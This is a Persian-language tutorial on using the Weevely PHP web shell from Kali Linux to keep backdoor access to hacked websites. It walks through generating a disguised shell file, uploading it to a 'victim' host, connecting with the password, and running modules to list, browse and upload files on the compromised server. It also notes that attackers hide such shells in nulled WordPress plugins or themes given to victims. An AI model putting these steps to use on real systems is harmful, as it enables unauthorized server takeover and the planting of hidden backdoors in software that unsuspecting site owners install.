این ابزار برای تست نفوذ به وبسایت ها استفاده می شود هکر ها با استفاده از این فایل دسترسی خود را بر روی سرور هک شده حفظ می کنند
backdoor (درب پشتی)
ابکدور (backdor) به معنای درب پشتی است ولی در مبحث هک و امنیت هکر ها برای نگهداری دسترسی بعد از نفوذ از ان استفاده می کنند
شل اسکریپت (shell)
شل به طور کلی به معنای دسترسی می باشد که انواع مختلفی در موضوعات مختلف دارد
شل اسکریپت ها برای حفظ دسترسی و حتی دسترسی های بیشتر در وب سایت های هک شده به کار میروند.
این شل به زبان php نوشته شده و باید در سرور های آپاچی اجرا شود
فهرست مطالب
معرفی ابزار weevely
این ابزار یک وب شل قدرتمند است که پس از اجرا بر روی سرور اپاچی به هکر دسترسی شل داده و امکان استفاده از 30 ماژول قدرتمند را می دهد.
آموزش استفاده از Weevely در کالی لینوکس
1. نصب و راه اندازی
اگر از سیستم عامل کالی لینوکس استفاده میکنید این ابزار به صورت پیش فرض در این سیستم عامل نصب است و نیازی به نصب دوباره آن نیست
sudo git clone https://github.com/epinna/weevely3.git
cd weevely3
python3 weevely.py
cd weevely3
python3 weevely.py
درصورتی که از این روش برای نصب استفاده کردید به جای weevely در دستورات زیر python weevely.py وارد کنید
2.ایجاد فایل شل
با دستور زیر می توانید فایل شل جدید بسازید برای مثال ما فایلی با نام googledb.php می سازیم و رمز آن را 123 می گذاریم و محل خروجی را دسکتاپ قرار دادیم ( نام کاربری ما zeroday است)
محل ذخیره سازی رمز weevely generate :دستور
weevely generate 123 /home/zeroday/Desktop/googledb.php:مثال
weevely generate 123 /home/zeroday/Desktop/googledb.php:مثال
سپس فایل شل را بر روی سایت مورد نظر آپلود کنید
هکر ها ممکن است برای مثال آن را در یک افزونه یا قالب وردپرسی جاسازی کنند و به صورت نال شده در اختیار قربانیان قرار دهند.
3.اتصال به فایل شل و گرفتن دسترسی
بسیار خوب پس از آپلود فایل شل در هاست قربانی وقت اتصال به آن می رسد ، برای اتصال می بایست دستور زیر را وارد کنید شما به آدرس فایل آپلود شده و رمزی که در مرحله ایجاد گذاشته اید نیاز دارید
رمز آدرس weevely :دستور
weevely http://site.com/googledb.php 123 :مثال
weevely http://site.com/googledb.php 123 :مثال
4.فهرست دستورات
در این مرحله پس از دسترسی می توانید دستورات لینوکسی را وارد کنید برای مثال دستور git clone یا دستور python یا cd و ls کار میکرد ولی ابزار weevely حدود 30 دستور دارد که با زدن دستور زیر می توانید آنها را مشاهده کنید.
help
5.چند مثال کاربردی از دستورات
در این مرحله تصمیم دارم شما را با چند دستور کاربردی آشنا کنم
دیدن لیست فایل های پوشه:
گاهی اوقات با زدن دستور ls قادر به دیدن فایل های پنهان نیستیم که با زدن دستور زیر این مشکل حل می شود
file_ls
جا به جا شدن در پوشه ها:
در برخی موارد برای جا به جا شدن و رفتن به بعضی از پوشه ها وقتی از دستور cd استفاده می کنیم با ارور دسترسی مواجه می شویم که با استفاده از دستورات زیر رفع می شود.
به جای [Folder] نام پوشه را قرار دهید
file_cd [Folder]
آپلود فایل روی سرور قربانی:
این دستور به ما کمک میکند که فایل هایمان را بر روی سرور قربانی آپلود کنیم
به جای [1] آدرس فایل در سیستم خودتان (می توانید فایل را در این مرحله در ترمینال بکشید و رها کنید تا آدرس در ترمینال درج شود)
به جای [2] آدرس محل آپلود فایل در سرور را وارد کنید
:file_upload2web [1] [2]
